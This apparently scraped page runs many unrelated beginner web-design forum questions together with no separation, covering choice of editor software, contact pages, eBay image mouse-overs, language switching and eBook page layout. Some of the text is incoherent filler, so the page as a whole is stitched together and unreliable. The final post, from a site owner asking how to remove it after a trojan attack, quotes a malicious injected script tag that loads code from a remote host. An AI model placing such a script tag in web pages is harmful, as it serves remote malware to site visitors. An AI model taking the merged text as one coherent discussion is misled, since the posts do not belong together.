HTML - New Member Seek Advise On What Software For Set Up My Web Site ?
Hi All , This is my first post.
I like to consult all of you here , what softare i should use to set up my web site. In the pass i try to set up using front page , that is 10 yr ago , and 5 yr ago i use dream waver . Now i not sure which software is better for me to set up my web site ? I need some user friendly software to set up , as i am no good in writing code. Hope some one can advise me. I need your help because of the following reasons: - I would like to see some ideas posted on several ways to get the utility up&running. - Paint of Windows98 may be circulating the WWW as a flash .SWF.. if someone knows of its existence; feel free to share. - Just wanna know what im getting myself into, so.. is this possible for a beginner? Is their a program or website I can use to reorganize my coding? I made my website on dreamweaver and it looks fine but I would like to make the html coding look as professional as possible. I am also having trouble making my own contact page. I am not familiar with php. Can anyone help me make a contact page? Also before launching my website how can I make sure it is secure from people stealing my email address and or content like .mp3. I also want to build one page shopping area to sell about 5-10 items. Can I do this all on my own with dreamweaver or do I need to sign up for things? Thank you. Hello, I would like some help with a mouse over if i may. I have been playing with my Ebay listing page by making it look a little more professional than basic. I have introduced a mouse over affect with 3 photos i have added to the page just to make it better but would like some further help if i may. Lets say i have the main photo named "A" and two other photos below it named "B" and "C". When the Ebay page is first viewed photo "A" is displayed correctly at the top in the main position,if you then move your mouse over photo "B" or "C" this image is now being shown where photo "A" was just shown in the main position. This is how i want it to be done & works fine BUT when you move your mouse off photo "B" or "C" that photo is still shown in the main photo space,i need it to revert back to photo "A" when the mouse is not over the smaller images. So far i can only make this happen if you leave & return to the page or refresh it. Any help & advice would be nice Very sorry for disturbing all of you. I am trying to learn html all by myself. I designed one psd and try to write the html code but it seems that it is not so easy for me now. Can not understand how to write it, how to make the header bg or top banner bg and so on. Hi, Im trying to get a website up and running for a small business just starting up without the finances to pay for a designer, I know a little bit of html, and have used dreamweaver before but im going to try and stick to HTML on this one if its possible so i can quite easily change it as i need to. I have added those long black dividers in paint to show you what im trying to do. Been playing about with it for hours today and got no where I know i could do it as one MASSIVE image but that wouldnt be very economical would it. Thanks for any advice. So I want to design a website that people sign up for a free service. Upon signing up they get a referral link to send people to the website. They have a members back page where they can log-in and have access to tools to advertise for the website and also track their hits to the website. I would also need an admin page that I could track their hits to their referral website and be able to e-mail all members at one time. My client wants a client login button on his website that will open up a piece of software on his and his employee's PC's (Microsoft terminal services client). Simply linking to C:\WINDOWS\system32\mstsc.exe doesn't seem to work. I'm guessing it's due to safety on the browsers behalf. Does anyone know how to make this work? Thanks. We have always embedded HTML code into our website so that visitors could choose french, german or whatever and then the whole site then worked in french or whatever the chosen language was. see our current site www.euroburolimited.co.uk As you will see this site needed an upgrade to better html standards and better visual presentation and so we bought a smart new template and have upgraded everything. Whilst the site is not yet published to our main domain the new version can be viewed on www.calmwoodlimited.com (This is just a spare domain that we are using for testing purposes. So whats's our problem ? On the original domain, the visitor chose his language and then the whole website worked in french - or whatever. on the new website, exactly the same code is embedded but it only works on the .index page - not on any of the others. How do we fix it so that we don't need to embed the code on every single page ? It must be something to do with the css div's or whatever. Any bright ideas please ? David. Hi everyone. I need to find some software that is like Adobe Contribute, but free. I am designing a web site for a friend and he wants to be able to edit it himself but cannot pay the price for Adobe Contribute. I have a 10-day window to buy a professional web design software package. Cost is no object. Currently 1) using hosting site for my web pages and 2) HTML (NVu & Kompozer) to develop e-books for publication. Need a combo WSYISWYG/HTML to be able to "see" what I'm doing. Not a professional web designer but eventually will need to learn how to self-manage my web site. Dreamweaver appears to be the preferred software of choice. Would a better option be one of the Adobe Creative Suites that includes Dreamweaver? At this point, my web site is fairly clean and simple and I'm not one for bells & whistles. Adobe Creative Suites include many features that I'm not sure I would use. But since the money is available should I invest now in anticipation of potential future use? I am new and don't know how to create webistes, and I have no shame in that. I am fairly familiar with computers as I spend about 4 hours a day on computer. I have always wanted to know how to create webistes and create one of my won. I don't want to use geocities or freewebs, since that's not creating websites..there's no skill in that..I want to learn the hardcore html. I am sure it's not hard once u get the hang of it but I have no clue. What I am asking of you pros on this site is: 1) suggest a good html creating software..somthing easy to understand and use for a beginner. 2) suggest some websites which give free megabites for you to start your site. I know how to use utorrent well..so any program you suggest to me won't be a problem to find for me. TY Newbie -- using KompoZer to prepare text & image pages for eBookGold publishing software. 1. No problem preparing pages. Copy and paste from Word doc. Clean up code as necessary. Simple formatting - no bells & whistles. Page width set at 580 pixels. 2. Each page viewed in IE7 is consistent with flush left margin and right margin consistent with 580 pixel width. Each page is tested for printing on 8.5x11 paper so pages can be numbered. 3. File is uploaded to eBook publishing software with default page view of 640x480. Software includes eBook viewer for computer use. Book generates successfully. 4. PROBLEM IS WITH VIEWING PAGES IN THE SOFTWARE READER. Some are the same as IE7. Others spread from edge to edge of the computer screen which, in some cases, affects the image and text placement. ???? Why is there a difference between IE7 and software publisher view of same page? Is there HTML code that can fix the problem? If yes, what is it and how do I do it? specifics would be appreciated. My employer and I are learning as we go -- any help is gratefully appreciated. I'm in need of a software that searches text in html files and replaces them ignoring the html tags. As example replace 1 with <b>1.</b> it should ignore tags like color="111111" and not make color="<b>1.</b><b>1.</b><b>1.</b><b>1.</b><b>1.</b><b>1.</b>" out of it. Hi, I am looking for ..uhhh freeware ... which can find one line of code in several HTML and HTM files and delete this one line. It is one line which occurs just once in every html and htm file .. and comes just before the <body>. I've tried a few and they all end up asking you to purchase. I have the following line in every single html and htm file.. and my webhost demands that I remove this malware (yes I had suffered a trojan horse virus attack earlier) <script src=http://zeta.zilina.net/g35/info.php ></script> Please help !!!
